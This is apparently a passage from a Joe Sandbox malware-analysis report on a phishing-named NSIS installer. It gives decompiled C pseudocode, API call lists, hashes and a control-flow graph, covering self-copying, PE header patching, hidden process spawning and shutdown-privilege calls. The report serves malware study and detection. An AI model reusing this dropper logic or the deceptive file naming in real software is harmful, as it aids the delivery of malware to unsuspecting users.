                                                																		continue;
                                                																	} else {
                                                																		goto L50;
                                                																	}
                                                																	do {
                                                																		L50:
                                                																		 *_t318 =  *_t333;
                                                																		_t318 = _t318;
                                                																		_t333 = _t333;
                                                																		_t254 = _t254 - 1;
                                                																	} while (_t254 != 0);
                                                																	goto L51;
                                                																}
                                                																 *_t350 = 0x20;
                                                																_t351 =  &(_t350[1]);
                                                																goto L52;
                                                															}
                                                															_t371 = _v8;
                                                															_t353 = _t371;
                                                															if( *_t371 == _t308) {
                                                																goto L74;
                                                															} else {
                                                																goto L55;
                                                															}
                                                															do {
                                                																L55:
                                                																_t256 =  *_t371;
                                                																if(_t256 != 0xd) {
                                                																	if(_t256 != 0xa) {
                                                																		_t371 = CharNextW(_t371);
                                                																		goto L64;
                                                																	}
                                                																	 *_t371 = _t308;
                                                																	while( *_t353 == _t308) {
                                                																		if(_t353 == _t371) {
                                                																			break;
                                                																		}
                                                																		_t353 =  &(_t353[1]);
                                                																	}
                                                																	_push(_v52);
                                                																	E007E17DD(_t353);
                                                																	_t371 =  &(_t371[1]);
                                                																	_t353 = _t371;
                                                																	goto L64;
                                                																}
                                                																 *_t371 = _t308;
                                                																_t371 =  &(_t371[1]);
                                                																L64:
                                                															} while ( *_t371 != _t308);
                                                															if(_t353 == _v8) {
                                                																goto L74;
                                                															}
                                                															_t328 = _v8;
                                                															while(1) {
                                                																_t258 =  *_t353;
                                                																if(_t258 == _t308) {
                                                																	break;
                                                																}
                                                																 *_t328 = _t258;
                                                																_t328 =  &(_t328[0]);
                                                																_t353 =  &(_t353[1]);
                                                															}
                                                															 *_t328 = _t308;
                                                															goto L74;
                                                														}
                                                														GlobalUnlock(_v12);
                                                														_t118 = _t349 + 0x800; // 0x903
                                                														_t262 = GlobalReAlloc(_v12, _t349 + _t118, 0x42);
                                                														_v12 = _t262;
                                                														if(_t262 == _t308) {
                                                															goto L75;
                                                														}
                                                														_v8 = GlobalLock(_t262);
                                                														goto L46;
                                                													}
                                                													_t326 =  *0x7e3cc8; // 0x400
                                                													_t375 = _v8;
                                                													lstrcpynW( &(_t375[lstrlenW(_t375)]), 0x7e34b8, _t326 - _t246);
                                                													goto L74;
                                                												}
                                                												L76:
                                                												if((_a4 & 0x00000002) != 0) {
                                                													E007E1A73(_v8);
                                                												}
                                                												if((_a4 & 0x00000001) != 0) {
                                                													_t216 = _v8;
                                                													if( *_v8 != _t308) {
                                                														_push(_v52);
                                                														E007E17DD(_t216);
                                                													}
                                                												}
                                                												if(_v44 == 0xc000001d) {
                                                													lstrcpyW( &_v436, L"error");
                                                												}
                                                												if(_v436 == _t308) {
                                                													wsprintfW( &_v436, L"%d", _v44);
                                                												}
                                                												E007E1A73( &_v436);
                                                												CloseHandle(_v92.hThread);
                                                												CloseHandle(_v92);
                                                												CloseHandle(_v40);
                                                												CloseHandle(_v28);
                                                												CloseHandle(_v48);
                                                												CloseHandle(_v64);
                                                												_t207 = _v36;
                                                												if(_t207 - 4 >= _v24) {
                                                													 *(_t207 - 4) = _t308;
                                                												}
                                                												if(_v16 != _t308) {
                                                													DeleteFileW(_v16);
                                                												}
                                                												_t208 = GlobalFree(_v24);
                                                												if(_a4 == _t308) {
                                                													return _t208;
                                                												} else {
                                                													GlobalUnlock(_v12);
                                                													return GlobalFree(_v12);
                                                												}
                                                											}
                                                										}
                                                										if((_a4 & 0x00000002) == 0) {
                                                											_t272 = 0x2000;
                                                										} else {
                                                											_t275 =  *0x7e3cc8; // 0x400
                                                											_t272 = _t275 + _t275;
                                                										}
                                                										_t273 = GlobalAlloc(0x42, _t272);
                                                										_v12 = _t273;
                                                										if(_t273 == _t308) {
                                                											goto L75;
                                                										} else {
                                                											_v8 = GlobalLock(_t273);
                                                											goto L31;
                                                										}
                                                									}
                                                									E007E1A73(L"error");
                                                									_t40 = _t339 - 4; // -4
                                                									if(_t40 >= _t364) {
                                                										 *(_t339 - 4) = _t308;
                                                									}
                                                									if(_v16 != _t308) {
                                                										DeleteFileW(_v16);
                                                									}
                                                									goto L6;
                                                								}
                                                								_v52 = 1;
                                                								goto L19;
                                                							}
                                                						}
                                                						_t298 = CreateFileW(_v16, 0xc0000000, 0, 0, 3, 0, 0);
                                                						_v36 = _t298;
                                                						_t362 = CreateFileMappingW(_t298, 0, 4, 0, 0, 0);
                                                						_t300 = MapViewOfFile(_t362, 2, 0, 0, 0);
                                                						if(_t300 != 0) {
                                                							_t310 =  *((intOrPtr*)(_t300 + 0x3c)) + _t300;
                                                							 *((short*)(_t310 + 0x16)) = 0x10e;
                                                							 *((short*)(_t310 + 0x5c)) = 3;
                                                							 *((intOrPtr*)(_t310 + 0x28)) = E007E194F -  *0x7e3cbc;
                                                							UnmapViewOfFile(_t300);
                                                						}
                                                						CloseHandle(_t362);
                                                						CloseHandle(_v36);
                                                						goto L11;
                                                					} else {
                                                						E007E1A73(L"error");
                                                						L6:
                                                						return GlobalFree(_t364);
                                                					}
                                                				}
                                                			}

                                                APIs
                                                  • Part of subcall function 007E1096: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,0000003F,?,007E113F), ref: 007E10A5
                                                  • Part of subcall function 007E1096: GetProcAddress.KERNEL32(00000000), ref: 007E10AC
                                                  • Part of subcall function 007E1096: GetCurrentProcess.KERNEL32(?,?,0000003F,?,007E113F), ref: 007E10BC
                                                • GetModuleFileNameW.KERNEL32(?,00000104), ref: 007E1159
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 007E1171
                                                • CharPrevW.USER32(?,?), ref: 007E119C
                                                • GlobalFree.KERNEL32 ref: 007E11C3
                                                • GetTempFileNameW.KERNEL32(?,007E30A4,00000000,?), ref: 007E11E3
                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 007E11F9
                                                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 007E1211
                                                • CreateFileMappingW.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 007E1221
                                                • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 007E122F
                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 007E1259
                                                • CloseHandle.KERNEL32(00000000), ref: 007E1266
                                                • CloseHandle.KERNEL32(?), ref: 007E126B
                                                • lstrcatW.KERNEL32(00000000,007E30A0), ref: 007E1273
                                                • lstrlenW.KERNEL32(00000000), ref: 007E127A
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 007E129D
                                                • FindWindowExW.USER32(000602C2,00000000,#32770,00000000), ref: 007E12D7
                                                • FindWindowExW.USER32(00000000), ref: 007E12DA
                                                • lstrcmpiW.KERNEL32(00000000,/OEM,00000000), ref: 007E1310
                                                • DeleteFileW.KERNEL32(?,error), ref: 007E134C
                                                • GetVersion.KERNEL32 ref: 007E1394
                                                • GlobalAlloc.KERNEL32(00000042,00002000), ref: 007E13E1
                                                • GlobalLock.KERNEL32 ref: 007E13F3
                                                • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 007E140B
                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 007E1418
                                                • CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 007E1437
                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007E144E
                                                • GetStartupInfoW.KERNEL32(00000044), ref: 007E145F
                                                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,?), ref: 007E1498
                                                • GetTickCount.KERNEL32 ref: 007E14A6
                                                • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 007E14CD
                                                • GetTickCount.KERNEL32 ref: 007E14DC
                                                • ReadFile.KERNELBASE(?,740976928,000003FF,?,00000000), ref: 007E14F8
                                                • lstrlenW.KERNEL32(?), ref: 007E1529
                                                • lstrlenW.KERNEL32(?,740976928,00000400), ref: 007E153F
                                                • lstrcpynW.KERNEL32(00000000), ref: 007E1545
                                                • lstrlenW.KERNEL32(740976928), ref: 007E1554
                                                • GlobalSize.KERNEL32(00000002), ref: 007E1560
                                                • GlobalUnlock.KERNEL32(00000002), ref: 007E1570
                                                • GlobalReAlloc.KERNEL32 ref: 007E1583
                                                • GlobalLock.KERNEL32 ref: 007E1595
                                                • lstrcatW.KERNEL32(?,740976928), ref: 007E15A2
                                                • GlobalSize.KERNEL32(00000002), ref: 007E15B5
                                                • lstrlenW.KERNEL32(00000000), ref: 007E15D5
                                                • lstrcpyW.KERNEL32 ref: 007E15F9
                                                • CharNextW.USER32(?), ref: 007E1660
                                                • GetTickCount.KERNEL32 ref: 007E1692
                                                • TerminateProcess.KERNEL32(?,000000FF), ref: 007E16A6
                                                • lstrcpyW.KERNEL32 ref: 007E16B8
                                                • Sleep.KERNELBASE(00000064), ref: 007E16C2
                                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 007E16CC
                                                • GetExitCodeProcess.KERNEL32 ref: 007E16DC
                                                • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 007E16ED
                                                • lstrcpyW.KERNEL32 ref: 007E1704
                                                • lstrcpyW.KERNEL32 ref: 007E1746
                                                • wsprintfW.USER32 ref: 007E1764
                                                • CloseHandle.KERNEL32(?,?), ref: 007E1782
                                                • CloseHandle.KERNEL32(?), ref: 007E1787
                                                • CloseHandle.KERNEL32(?), ref: 007E178C
                                                • CloseHandle.KERNEL32(?), ref: 007E1791
                                                • CloseHandle.KERNEL32(?), ref: 007E1796
                                                • CloseHandle.KERNEL32(?), ref: 007E179B
                                                • DeleteFileW.KERNEL32(?), ref: 007E17B4
                                                • GlobalFree.KERNEL32 ref: 007E17C3
                                                • GlobalUnlock.KERNEL32(00000001), ref: 007E17CD
                                                • GlobalFree.KERNEL32 ref: 007E17D6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.512316824.00000000007E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007E0000, based on PE: true
                                                • Associated: 00000000.00000002.512304950.00000000007E0000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000000.00000002.512325440.00000000007E2000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000000.00000002.512337115.00000000007E3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000000.00000002.512347213.00000000007E4000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7e0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Global$File$Handle$Close$Createlstrlen$AllocPipeProcesslstrcpy$CountFreeTick$CharDeleteDescriptorFindLockModuleNameNamedPeekSecuritySizeUnlockViewWindowlstrcat$AddressCodeCopyCurrentDaclExitInfoInitializeMappingNextObjectPrevProcReadSingleSleepStartupTempTerminateUnmapVersionWaitlstrcmpilstrcpynwsprintf
                                                • String ID: $ i)w$#32770$/OEM$/TIMEOUT=$740976928$740976928$D$SysListView32$error$timeout
                                                • API String ID: 4049317599-3140818848
                                                • Opcode ID: dd8dc74005539f45ff326b9b5ae81224afc8a80b01f2a373d9e6259edb25a643
                                                • Instruction ID: acccdbadb67ad22eb25ecc571869661f1ed02ba127e593541d64aa19a82bdead
                                                • Opcode Fuzzy Hash: dd8dc74005539f45ff326b9b5ae81224afc8a80b01f2a373d9e6259edb25a643
                                                • Instruction Fuzzy Hash: B422B371902289EFDB119FA5DC89AAEBBBDFF0C304F504069E505E71A1DB385E81CB64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 115 40327d-4032af SetErrorMode GetVersion 116 4032b1-4032b9 call 406408 115->116 117 4032c2-403355 call 40639c * 3 call 406408 * 2 #17 OleInitialize SHGetFileInfoW call 406032 GetCommandLineW call 406032 GetModuleHandleW 115->117 116->117 122 4032bb 116->122 135 403357-40335e 117->135 136 40335f-403379 call 405a13 CharNextW 117->136 122->117 135->136 139 403491-4034ab GetTempPathW call 40324c 136->139 140 40337f-403385 136->140 147 403503-40351d DeleteFileW call 402dee 139->147 148 4034ad-4034cb GetWindowsDirectoryW lstrcatW call 40324c 139->148 141 403387-40338c 140->141 142 40338e-403394 140->142 141->141 141->142 145 403396-40339a 142->145 146 40339b-40339f 142->146 145->146 149 4033a5-4033ab 146->149 150 40345d-40346a call 405a13 146->150 168 403523-403529 147->168 169 4035ce-4035df call 4037a1 OleUninitialize 147->169 148->147 164 4034cd-4034fd GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40324c 148->164 154 4033c5-4033fe 149->154 155 4033ad-4033b4 149->155 166 40346c-40346d 150->166 167 40346e-403474 150->167 161 403400-403405 154->161 162 40341b-403455 154->162 159 4033b6-4033b9 155->159 160 4033bb 155->160 159->154 159->160 160->154 161->162 163 403407-40340f 161->163 162->150 165 403457-40345b 162->165 171 403411-403414 163->171 172 403416 163->172 164->147 164->169 165->150 174 40347c-40348a call 406032 165->174 166->167 167->140 175 40347a 167->175 176 4035be-4035c5 call 40387b 168->176 177 40352f-40353a call 405a13 168->177 184 403705-40370b 169->184 185 4035e5-4035f5 call 405777 ExitProcess 169->185 171->162 171->172 172->162 180 40348f 174->180 175->180 187 4035ca 176->187 191 403588-403592 177->191 192 40353c-403571 177->192 180->139 189 403789-403791 184->189 190 40370d-403723 GetCurrentProcess OpenProcessToken 184->190 187->169 193 403793 189->193 194 403797-40379b ExitProcess 189->194 198 403725-403753 LookupPrivilegeValueW AdjustTokenPrivileges 190->198 199 403759-403767 call 406408 190->199 196 403594-4035a2 call 405aee 191->196 197 4035fb-40360f call 4056fa lstrcatW 191->197 200 403573-403577 192->200 193->194 196->169 210 4035a4-4035ba call 406032 * 2 196->210 211 403611-403617 lstrcatW 197->211 212 40361c-403636 lstrcatW lstrcmpiW 197->212 198->199 213 403775-403780 ExitWindowsEx 199->213 214 403769-403773 199->214 201 403580-403584 200->201 202 403579-40357e 200->202 201->200 206 403586 201->206 202->201 202->206 206->191 210->176 211->212 212->169 217 403638-40363b 212->217 213->189 215 403782-403784 call 40140b 213->215 214->213 214->215 215->189 220 403644 call 4056dd 217->220 221 40363d-403642 call 405660 217->221 226 403649-403657 SetCurrentDirectoryW 220->226 221->226 229 403664-40368d call 406032 226->229 230 403659-40365f call 406032 226->230 234 403692-4036ae call 406054 DeleteFileW 229->234 230->229 237 4036b0-4036c0 CopyFileW 234->237 238 4036ef-4036f7 234->238 237->238 240 4036c2-4036e2 call 405ed3 call 406054 call 405712 237->240 238->234 239 4036f9-403700 call 405ed3 238->239 239->169 240->238 249 4036e4-4036eb CloseHandle 240->249 249->238
                                                C-Code - Quality: 82%
                                                			_entry_() {
                                                				struct _SHFILEINFOW _v716;
                                                				int _v720;
                                                				WCHAR* _v724;
                                                				struct _TOKEN_PRIVILEGES _v732;
                                                				signed int _v736;
                                                				void* _v740;
                                                				int _v744;
                                                				WCHAR* _v748;
                                                				intOrPtr _v752;
                                                				intOrPtr _v756;
                                                				int _v764;
                                                				void* _v772;
                                                				intOrPtr _t53;
                                                				WCHAR* _t57;
                                                				char* _t60;
                                                				void* _t63;
                                                				void* _t65;
                                                				intOrPtr _t67;
                                                				signed int _t69;
                                                				int _t72;
                                                				intOrPtr* _t73;
                                                				int _t74;
                                                				int _t76;
                                                				void* _t100;
                                                				signed int _t117;
                                                				void* _t120;
                                                				void* _t125;
                                                				intOrPtr _t144;
                                                				intOrPtr _t145;
                                                				intOrPtr* _t146;
                                                				void* _t148;
                                                				char* _t149;
                                                				void* _t152;
                                                				int _t153;
                                                				signed int _t157;
                                                				signed int _t162;
                                                				signed int _t167;
                                                				void* _t169;
                                                				void* _t172;
                                                				int* _t174;
                                                				signed int _t180;
                                                				signed int _t183;
                                                				void* _t184;
                                                				WCHAR* _t185;
                                                				int _t191;
                                                				signed int _t194;
                                                				void* _t237;
                                                
                                                				_t191 = 0;
                                                				_t184 = 0x20;
                                                				_v720 = 0;
                                                				_v724 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                				_v716.iIcon = 0;
                                                				SetErrorMode(0x8001); // executed
                                                				if(GetVersion() != 6) {
                                                					_t146 = E00406408(0);
                                                					if(_t146 != 0) {
                                                						 *_t146(0xc00);
                                                					}
                                                				}
                                                				E0040639C("UXTHEME"); // executed
                                                				E0040639C("USERENV"); // executed
                                                				E0040639C("SETUPAPI"); // executed
                                                				E00406408(9);
                                                				_t53 = E00406408(7);
                                                				 *0x7a8a44 = _t53;
                                                				__imp__#17(_t169, _t148);
                                                				__imp__OleInitialize(_t191); // executed
                                                				 *0x7a8af8 = _t53;
                                                				SHGetFileInfoW(0x79ff00, _t191,  &_v716, 0x2b4, _t191); // executed
                                                				E00406032("Overcaustically Setup", L"NSIS Error");
                                                				_t57 = GetCommandLineW();
                                                				_t149 = L"\"C:\\Users\\frontdesk\\Desktop\\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe\"";
                                                				E00406032(_t149, _t57);
                                                				 *0x7a8a40 = GetModuleHandleW(_t191);
                                                				_t60 = _t149;
                                                				if(L"\"C:\\Users\\frontdesk\\Desktop\\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe\"" == 0x22) {
                                                					_t60 =  &M007B3002;
                                                					_t184 = 0x22;
                                                				}
                                                				_t153 = CharNextW(E00405A13(_t60, _t184));
                                                				_v748 = _t153;
                                                				_t63 =  *_t153;
                                                				if(_t63 == _t191) {
                                                					L28:
                                                					_t185 = L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\";
                                                					GetTempPathW(0x400, _t185);
                                                					_t65 = E0040324C(_t153, 0);
                                                					_t219 = _t65;
                                                					if(_t65 != 0) {
                                                						L31:
                                                						DeleteFileW(L"1033"); // executed
                                                						_t67 = E00402DEE(_t221, _v736); // executed
                                                						_v752 = _t67;
                                                						if(_t67 != _t191) {
                                                							L43:
                                                							E004037A1();
                                                							__imp__OleUninitialize();
                                                							_t233 = _v748 - _t191;
                                                							if(_v748 == _t191) {
                                                								__eflags =  *0x7a8ad4 - _t191;
                                                								if( *0x7a8ad4 == _t191) {
                                                									L67:
                                                									_t69 =  *0x7a8aec;
                                                									__eflags = _t69 - 0xffffffff;
                                                									if(_t69 != 0xffffffff) {
                                                										_v744 = _t69;
                                                									}
                                                									ExitProcess(_v744);
                                                								}
                                                								_t72 = OpenProcessToken(GetCurrentProcess(), 0x28,  &_v740);
                                                								__eflags = _t72;
                                                								if(_t72 != 0) {
                                                									LookupPrivilegeValueW(_t191, L"SeShutdownPrivilege",  &(_v732.Privileges));
                                                									_v732.PrivilegeCount = 1;
                                                									_v720 = 2;
                                                									AdjustTokenPrivileges(_v740, _t191,  &_v732, _t191, _t191, _t191);
                                                								}
                                                								_t73 = E00406408(4);
                                                								__eflags = _t73 - _t191;
                                                								if(_t73 == _t191) {
                                                									L65:
                                                									_t74 = ExitWindowsEx(2, 0x80040002);
                                                									__eflags = _t74;
                                                									if(_t74 != 0) {
                                                										goto L67;
                                                									}
                                                									goto L66;
                                                								} else {
                                                									_t76 =  *_t73(_t191, _t191, _t191, 0x25, 0x80040002);
                                                									__eflags = _t76;
                                                									if(_t76 == 0) {
                                                										L66:
                                                										E0040140B(9);
                                                										goto L67;
                                                									}
                                                									goto L65;
                                                								}
                                                							}
                                                							E00405777(_v748, 0x200010);
                                                							ExitProcess(2);
                                                						}
                                                						if( *0x7a8a5c == _t191) {
                                                							L42:
                                                							 *0x7a8aec =  *0x7a8aec | 0xffffffff;
                                                							_v744 = E0040387B( *0x7a8aec);
                                                							goto L43;
                                                						}
                                                						_t174 = E00405A13(_t149, _t191);
                                                						if(_t174 < _t149) {
                                                							L39:
                                                							_t230 = _t174 - _t149;
                                                							_v748 = L"Error launching installer";
                                                							if(_t174 < _t149) {
                                                								_t172 = E004056FA(_t233);
                                                								lstrcatW(_t185, L"~nsu");
                                                								if(_t172 != _t191) {
                                                									lstrcatW(_t185, "A");
                                                								}
                                                								lstrcatW(_t185, L".tmp");
                                                								_t151 = L"C:\\Users\\frontdesk\\Desktop";
                                                								if(lstrcmpiW(_t185, L"C:\\Users\\frontdesk\\Desktop") != 0) {
                                                									_push(_t185);
                                                									if(_t172 == _t191) {
                                                										E004056DD();
                                                									} else {
                                                										E00405660();
                                                									}
                                                									SetCurrentDirectoryW(_t185);
                                                									_t237 = L"C:\\Users\\frontdesk\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis" - _t191; // 0x43
                                                									if(_t237 == 0) {
                                                										E00406032(L"C:\\Users\\frontdesk\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis", _t151);
                                                									}
                                                									E00406032(0x7a9000, _v740);
                                                									_t154 = "A" & 0x0000ffff;
                                                									 *0x7a9800 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                									_t152 = 0x1a;
                                                									do {
                                                										E00406054(_t152, 0x79f700, _t185, 0x79f700,  *((intOrPtr*)( *0x7a8a50 + 0x120)));
                                                										DeleteFileW(0x79f700);
                                                										if(_v756 != _t191 && CopyFileW(L"C:\\Users\\frontdesk\\Desktop\\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe", 0x79f700, 1) != 0) {
                                                											E00405ED3(_t154, 0x79f700, _t191);
                                                											E00406054(_t152, 0x79f700, _t185, 0x79f700,  *((intOrPtr*)( *0x7a8a50 + 0x124)));
                                                											_t100 = E00405712(0x79f700);
                                                											if(_t100 != _t191) {
                                                												CloseHandle(_t100);
                                                												_v748 = _t191;
                                                											}
                                                										}
                                                										 *0x7a9800 =  *0x7a9800 + 1;
                                                										_t152 = _t152 - 1;
                                                									} while (_t152 != 0);
                                                									E00405ED3(_t154, _t185, _t191);
                                                								}
                                                								goto L43;
                                                							}
                                                							 *_t174 = _t191;
                                                							_t175 =  &(_t174[2]);
                                                							if(E00405AEE(_t230,  &(_t174[2])) == 0) {
                                                								goto L43;
                                                							}
                                                							E00406032(L"C:\\Users\\frontdesk\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis", _t175);
                                                							E00406032(L"C:\\Users\\frontdesk\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis\\Grusendes\\Stoser\\Unappealingness\\Dermobranchiate", _t175);
                                                							_v764 = _t191;
                                                							goto L42;
                                                						}
                                                						asm("cdq");
                                                						asm("cdq");
                                                						asm("cdq");
                                                						_t157 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                						_t117 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t162 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
                                                						while( *_t174 != _t157 || _t174[1] != _t117) {
                                                							_t174 = _t174;
                                                							if(_t174 >= _t149) {
                                                								continue;
                                                							}
                                                							break;
                                                						}
                                                						_t191 = 0;
                                                						goto L39;
                                                					}
                                                					GetWindowsDirectoryW(_t185, 0x3fb);
                                                					lstrcatW(_t185, L"\\Temp");
                                                					_t120 = E0040324C(_t153, _t219);
                                                					_t220 = _t120;
                                                					if(_t120 != 0) {
                                                						goto L31;
                                                					}
                                                					GetTempPathW(0x3fc, _t185);
                                                					lstrcatW(_t185, L"Low");
                                                					SetEnvironmentVariableW(L"TEMP", _t185);
                                                					SetEnvironmentVariableW(L"TMP", _t185);
                                                					_t125 = E0040324C(_t153, _t220);
                                                					_t221 = _t125;
                                                					if(_t125 == 0) {
                                                						goto L43;
                                                					}
                                                					goto L31;
                                                				} else {
                                                					goto L6;
                                                				}
                                                				do {
                                                					L6:
                                                					_t162 = 0x20;
                                                					if(_t63 != _t162) {
                                                						L8:
                                                						_t194 = _t162;
                                                						if( *_t153 == 0x22) {
                                                							_t153 = _t153 + 2;
                                                							_t194 = 0x22;
                                                						}
                                                						if( *_t153 != 0x2f) {
                                                							goto L22;
                                                						} else {
                                                							_t153 = _t153 + 2;
                                                							if( *_t153 == 0x53) {
                                                								_t145 =  *((intOrPtr*)(_t153 + 2));
                                                								if(_t145 == _t162 || _t145 == 0) {
                                                									 *0x7a8ae0 = 1;
                                                								}
                                                							}
                                                							asm("cdq");
                                                							asm("cdq");
                                                							_t167 = L"NCRC" & 0x0000ffff;
                                                							asm("cdq");
                                                							_t180 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t167;
                                                							if( *_t153 == (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t167) &&  *((intOrPtr*)(_t153 + 4)) == _t180) {
                                                								_t144 =  *((intOrPtr*)(_t153 + 8));
                                                								if(_t144 == 0x20 || _t144 == 0) {
                                                									_v736 = _v736 | 0x00000004;
                                                								}
                                                							}
                                                							asm("cdq");
                                                							asm("cdq");
                                                							_t162 = L" /D=" & 0x0000ffff;
                                                							asm("cdq");
                                                							_t183 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t162;
                                                							if( *(_t153 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t162) ||  *_t153 != _t183) {
                                                								goto L22;
                                                							} else {
                                                								 *(_t153 - 4) =  *(_t153 - 4) & 0x00000000;
                                                								__eflags = _t153;
                                                								E00406032(L"C:\\Users\\frontdesk\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis", _t153);
                                                								L27:
                                                								_t191 = 0;
                                                								goto L28;
                                                							}
                                                						}
                                                					} else {
                                                						goto L7;
                                                					}
                                                					do {
                                                						L7:
                                                						_t153 = _t153 + 2;
                                                					} while ( *_t153 == _t162);
                                                					goto L8;
                                                					L22:
                                                					_t153 = E00405A13(_t153, _t194);
                                                					if( *_t153 == 0x22) {
                                                						_t153 = _t153 + 2;
                                                					}
                                                					_t63 =  *_t153;
                                                				} while (_t63 != 0);
                                                				goto L27;
                                                			}
                                                0x00403287
                                                0x00403289
                                                0x0040328a
                                                0x00403293
                                                0x0040329b
                                                0x0040329f
                                                0x004032af
                                                0x004032b2
                                                0x004032b9
                                                0x004032c0
                                                0x004032c0
                                                0x004032b9
                                                0x004032c9
                                                0x004032d3
                                                0x004032dd
                                                0x004032e4
                                                0x004032eb
                                                0x004032f0
                                                0x004032f5
                                                0x004032fc
                                                0x00403302
                                                0x00403318
                                                0x00403328
                                                0x0040332d
                                                0x00403333
                                                0x0040333a
                                                0x0040334e
                                                0x00403353
                                                0x00403355
                                                0x00403359
                                                0x0040335e
                                                0x0040335e
                                                0x0040336d
                                                0x0040336f
                                                0x00403373
                                                0x00403379
                                                0x00403491
                                                0x00403497
                                                0x004034a2
                                                0x004034a4
                                                0x004034a9
                                                0x004034ab
                                                0x00403503
                                                0x00403508
                                                0x00403512
                                                0x00403519
                                                0x0040351d
                                                0x004035ce
                                                0x004035ce
                                                0x004035d3
                                                0x004035d9
                                                0x004035df
                                                0x00403705
                                                0x0040370b
                                                0x00403789
                                                0x00403789
                                                0x0040378e
                                                0x00403791
                                                0x00403793
                                                0x00403793
                                                0x0040379b
                                                0x0040379b
                                                0x0040371b
                                                0x00403721
                                                0x00403723
                                                0x00403730
                                                0x00403743
                                                0x0040374b
                                                0x00403753
                                                0x00403753
                                                0x0040375b
                                                0x00403760
                                                0x00403767
                                                0x00403775
                                                0x00403778
                                                0x0040377e
                                                0x00403780
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403769
                                                0x0040376f
                                                0x00403771
                                                0x00403773
                                                0x00403782
                                                0x00403784
                                                0x00000000
                                                0x00403784
                                                0x00000000
                                                0x00403773
                                                0x00403767
                                                0x004035ee
                                                0x004035f5
                                                0x004035f5
                                                0x00403529
                                                0x004035be
                                                0x004035be
                                                0x004035ca
                                                0x00000000
                                                0x004035ca
                                                0x00403536
                                                0x0040353a
                                                0x00403588
                                                0x00403588
                                                0x0040358a
                                                0x00403592
                                                0x00403606
                                                0x00403608
                                                0x0040360f
                                                0x00403617
                                                0x00403617
                                                0x00403622
                                                0x00403627
                                                0x00403636
                                                0x0040363a
                                                0x0040363b
                                                0x00403644
                                                0x0040363d
                                                0x0040363d
                                                0x0040363d
                                                0x0040364a
                                                0x00403650
                                                0x00403657
                                                0x0040365f
                                                0x0040365f
                                                0x0040366d
                                                0x00403679
                                                0x00403687
                                                0x0040368c
                                                0x00403692
                                                0x0040369e
                                                0x004036a4
                                                0x004036ae
                                                0x004036c4
                                                0x004036d5
                                                0x004036db
                                                0x004036e2
                                                0x004036e5
                                                0x004036eb
                                                0x004036eb
                                                0x004036e2
                                                0x004036ef
                                                0x004036f6
                                                0x004036f6
                                                0x004036fb
                                                0x004036fb
                                                0x00000000
                                                0x00403636
                                                0x00403594
                                                0x00403597
                                                0x004035a2
                                                0x00000000
                                                0x00000000
                                                0x004035aa
                                                0x004035b5
                                                0x004035ba
                                                0x00000000
                                                0x004035ba
                                                0x00403543
                                                0x0040355b
                                                0x0040356c
                                                0x0040356d
                                                0x00403571
                                                0x00403573
                                                0x00403581
                                                0x00403584
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403584
                                                0x00403586
                                                0x00000000
                                                0x00403586
                                                0x004034b3
                                                0x004034bf
                                                0x004034c4
                                                0x004034c9
                                                0x004034cb
                                                0x00000000
                                                0x00000000
                                                0x004034d3
                                                0x004034db
                                                0x004034ec
                                                0x004034f4
                                                0x004034f6
                                                0x004034fb
                                                0x004034fd
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040337f
                                                0x0040337f
                                                0x00403381
                                                0x00403385
                                                0x0040338e
                                                0x00403392
                                                0x00403394
                                                0x00403399
                                                0x0040339a
                                                0x0040339a
                                                0x0040339f
